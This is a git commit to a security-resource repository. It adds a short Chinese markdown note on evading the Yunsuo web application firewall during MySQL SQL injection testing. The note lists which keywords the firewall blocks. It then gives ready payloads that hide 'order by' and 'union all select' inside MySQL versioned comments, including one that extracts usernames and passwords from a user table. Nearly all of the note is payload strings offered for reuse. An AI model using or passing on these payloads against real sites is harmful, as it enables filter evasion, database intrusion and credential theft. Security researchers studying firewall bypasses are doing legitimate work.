add bypass云锁注入测试.md

This commit is contained in:
Mrxn 2020-04-06 14:44:41 +08:00
parent 49198c1cd9
commit 810c7f7b10
6 changed files with 39 additions and 0 deletions

View File

@ -326,6 +326,7 @@
- [SQL注入Bypass安全狗4.0](./books/SQL注入Bypass安全狗4.0.pdf)
- [通过正则类SQL注入防御的绕过技巧](./books/通过正则类SQL注入防御的绕过技巧.pdf)
- [MYSQL_SQL_BYPASS_WIKI-mysql注入,bypass的一些心得](https://github.com/aleenzz/MYSQL_SQL_BYPASS_WIKI)
- [bypass云锁注入测试](./books/bypass云锁注入测试.md)
## <span id="head9"> 说明</span>

View File

@ -0,0 +1,38 @@
## bypass云锁注入测试
**实验环境**
刚去云锁官网下的
Apache/2.4.23
PHP/5.4
mysql 5
**Paylaod**
`order by `拦截
![](../img/bypass_yunshuo4.png)
`order/*!10000by*/5 `
![](../img/bypass_yunshuo3.png)
union 不拦截
select 不拦截
union select 拦截
union 各种字符 select 拦截
`union/*select*/ `不拦截
`union%20/*!10000all%20select*/%201,2,database/**/(),4,5`
![](../img/bypass_yunshuo1.png)
`union/*!10000all*//*!10000select+1,password,username*/,4,5%20from%20user`
![](../img/bypass_yunshuo2.png)
来源:https://www.t00ls.net/articles-55793.html
欢迎大家投稿注册土司.

BIN
img/bypass_yunshuo1.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 10 KiB

BIN
img/bypass_yunshuo2.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 13 KiB

BIN
img/bypass_yunshuo3.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 8.4 KiB

BIN
img/bypass_yunshuo4.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB